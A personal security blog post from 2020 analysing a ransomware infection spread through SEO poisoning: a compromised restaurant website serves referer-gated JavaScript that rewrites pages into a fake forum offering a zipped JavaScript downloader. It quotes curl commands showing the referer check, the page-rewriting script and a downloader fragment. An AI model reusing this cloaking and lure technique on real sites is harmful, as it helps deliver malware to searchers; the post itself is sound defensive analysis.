vendredi 29 mai 2020

When ransomware does SEO

Last night I was called by a friend. Usual story, someone he knows has been cryptolocked, that's tragic, usual tears and screams, yadda yadda.

When this particular story gets interesting is how the victim got infected. Usually, ransomware are deployed through mail attachment. This one was not really delivered to the victim, it was more the victim itself that fetch the ransomware. How does it possible? 

We'll see, it'a tragedy in 3 steps.

I choose to write this blogpost because of this unusual delivery mechanism: using SEO to trick people into getting fake documents infected with malware is a funny move.

### Step 1, when an innocent website gets infected

At first, the pirate infect a website. In our precise case, its a french restaurant www.--REDACTED--.net. At first glance, nothing is suspect. The pirate adds a lot of pages in the blog section, with targeted contents, and "modèle" (model):
  • modèle nez rhinoplaste
  • modèle lettre de réclamation freebox
  • modèle pestel d'une entreprise
  • ...
All of those pages include a javascript link: "http://www.--REDACTED--.net/?aca30b6=223500"

The first tricky part is here: You can download the js file, it's empty. So, how's thing working? It's because the infected webiste checks your referer. If you have a google referer, the js document gets really interesting:

Technically speaking:

$ curl http://www.--REDACTED--.net/?aca30b6=223500
(nothing, empty page)

gives you an empty result, but:

$ curl --referer "google/?q=recherche.de.mandat" http://www.-REDACTED--.net/?aca30b6=223500
(data is fetched..)
The javascript file is this one:

function remove(elem) 
{ if (!elem) return; 
elem.parentNode.removeChild(elem);
 } 
if (!document.all) document.all = document.getElementsByTagName("*");

for (i = 0; i < document.all.length; i++) {
 if (document.all[i].tagName == "BODY" || document.all[i].tagName == "HTML") { } 
else { remove(document.all[i]);} 
} 
document.body.innerHTML = '<html><head><title>exemple de mandat gestion de projet</title>(and all HTML code of page goes here)...

And we go to the step 2. This javascript wipe all HTML tag, and rewrite all the page. The page title is precisely the query search made by the victim.

The beauty of tracking the google referer is that the legitimate owner will never see a problem: you don't browse your own site from google search... The google referer hack is not something new, but still really efficient.

## Step 2 : a so innocent forum


Look now at this beautiful site, this is not a restaurant anymore, this look like a forum. Nice user Fluffy asks for the exact same model searched (once again, the google query), and Admin answer with a link to the doc. Fluffy says thanks, soooo legit.

If you look now for the victim side, nothing is suspected:
  • you search for a model of something
  • you click on a google link
  • you land on a forum with a link to the doc searched
  • --> I dare anybody to don't click to the link at this point!
This is why this attack is so effective. Pirates doesn't send mail attachment, they do SEO and wait to victim to fall in trap. (Sort of waterholing attack?)

And you guessed it! This is not a document. This is a zip, containing a .js file which download the final part of the puzzle. The name of the .js file? Exactly the name of the searched terms.

The .js file is obfuscated:



but you can recreate the real payload quite easily (no crypto, just the payload encoded twice):

## Step 3 : the final stage of the attack

This is the last script:


Now, the victim will download the last stage of the attack. As you can see, the victim generates a random number 
Ua88 = Math.random().toString()["substr"](2,70+30);
and the consequent download will be checked against this key. The lbhdqisaoetysdwz= variable name change for each download. There are other checks to bypass to get the final payload, but it's always the same things, timers, HTTP header checks, and so on.

## Conclusion

This blogpost has been written because I've never seen this kind of infection before. The legitimate user search for something, and the pirates paved all the way for him to get lost... 

A quick google search with choosen term shows that we have more blog infected with those models in a lot of blogs:


Another one:

Because when you know where to look, you find a lot of those sites. And for the fun fact, all commas are changed to backticks for an unknown reason (maybe because the pirate doesn't know how to escape commas 😃 ).

And as usual, the VirusTotal shame for the js file



One last note for the user: He did some backups, and its antivirus killed the ransomware around after the tenth file encrypted. That's all for today, and be safe.